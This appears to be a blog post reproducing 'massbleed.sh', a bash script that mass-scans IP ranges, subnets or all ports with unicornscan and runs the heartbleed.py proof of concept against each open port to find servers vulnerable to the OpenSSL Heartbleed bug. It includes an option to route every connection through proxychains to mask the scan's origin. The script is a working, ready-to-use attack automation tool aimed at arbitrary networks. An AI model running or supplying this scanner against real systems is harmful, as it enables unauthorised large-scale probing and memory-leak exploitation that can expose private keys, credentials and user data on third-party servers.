#!/bin/bash
# massbleed.sh 20140423 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# Prerequisites:
# Is the heartbleed POC present?
# Is unicornscan installed?
# Is nmap installed?
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== massbleed.sh 20140423 by 1N3"
echo ""
HEARTBLEED=`ls heartbleed.py`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
RANGE=$1
ALL_PORTS=$2
CUSTOM_PORT=$3
PROXY=$4
PORT_RANGE="1-65000"
if [ "$HEARTBLEED" != "heartbleed.py" ]; then
echo "(--==== heartbleed.py not found!"
echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"
exit
fi
if [ "$UNICORNSCAN" == "" ]; then
echo "(--==== unicornscan not installed! Exiting..."
exit
fi
if [ "$NMAP" == "" ]; then
echo "(--==== nmap not installed! Exiting..."
exit
fi
if [ -z "$1" ]; then
echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
exit
fi
if [ "$PROXY" = "proxy" ]; then
echo "(--==== scanning via proxy..."
if [ "$ALL_PORTS" = "single" ]; then
if [ "$CUSTOM_PORT" != "0" ]; then
echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null
else
for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
done;
fi
fi
if [ "$ALL_PORTS" = "subnet" ]; then
for a in {1..254};
do
echo "Scanning: $RANGE$a"
for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
do
echo "$RANGE$a:$b"
proxychains python heartbleed.py $RANGE$a -p $b | grep Server;
done;
done;
fi
if [ "$ALL_PORTS" = "port" ]; then
for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
done;
else
for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;
done
fi
else
if [ "$ALL_PORTS" = "single" ]; then
for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
done;
fi
if [ "$ALL_PORTS" = "subnet" ]; then
for a in {1..254};
do
echo "Scanning: $RANGE$a"
for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
do
echo "$RANGE$a:$b"
python heartbleed.py $RANGE$a -p $b | grep Server;
done;
done;
fi
if [ "$ALL_PORTS" = "port" ]; then
for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
done;
else
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;
done
fi
fi
echo "(--==== scan complete!"
exit
No comments:
Post a Comment